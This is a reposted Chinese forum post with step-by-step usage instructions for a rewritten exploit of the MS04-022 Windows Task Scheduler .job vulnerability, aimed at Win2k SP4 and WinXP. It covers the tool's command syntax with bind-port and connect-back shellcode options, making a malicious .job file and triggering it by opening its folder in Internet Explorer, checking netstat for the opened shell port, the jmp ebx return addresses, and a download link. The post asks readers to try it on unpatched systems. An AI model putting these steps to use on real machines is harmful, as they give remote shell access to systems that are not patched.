[转载]MS04022漏洞测试

信息来源：www.ringz.org
文章作者：无敌最寂寞

今天又看到关于ms04022漏洞的exploit了，可是又是针对winxp的。由于我系统的原因不能作测试，因此对该漏洞我也未有问津。今天看到该漏洞的exp更新这么快，于是就想测试一下。

在看完该漏洞的exp后，我做了修改可以让他针对win2k 和xp了。
工具运行帮助如下：
(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

--- Coded by .::[ houseofdabus ]::. ---

--- rewriten by superlone@www.ringz.org ----

Usage:
ms04022 <file> <OS Type> <shellcode> <bind/connectback port> [connectback IP]

OS Type:
0 - win2k sp4
1 - winxp sp0/sp1

Shellcode:
1 - Portbind shellcode
2 - Connectback shellcode

参数依次是：
生成的job文件名 系统类型 shell方式 端口 反向连接IP

其中系统类型为：
0 win2k
1 winxp

shell类型：
1 邦定端口
2 反向连接方式

我没有作任何测试，所以需要大家帮忙的就是测试了。请大家测试吧，当然前提是你的计划任务要开着，而且漏洞补丁不要打哦。。。

测试步骤如下：

将工具下载解压到任意目录（比如c:\test ）
然后在cmd下进入这个目录，输入：
c:\test > ms04022 test.job 0 1 5277
执行后会在同目录下生成以个叫test.job 的文件。
然后打开你的 IE，在地址栏里输入这个test.job 所在的路径。（在这里是 c:\test ）
打开这个目录后，如果漏洞存在，益处就会发生了。用netstat看一下5277端口是否打开了。
以上是针对win2k 系统的。
xp是一样的，只要把系统类型换成1就可以了！

另外，如果不成功的话请你用压缩包里的jmpesp工具看一下你的jmp ebx的地址，这样输入：
jmpesp 2 advapi32.dll

然后察看那个中括号里是[jmp ebx]前面的地址。如果不是：0x796d8f43
请报告到这个帖子来！（这个地址指的是win2k的，xp的应该是0x77dc821e。）
多谢各位的帮助了！

注：测试工具下载地址http://www.ringz.org/tools/ms04022.rar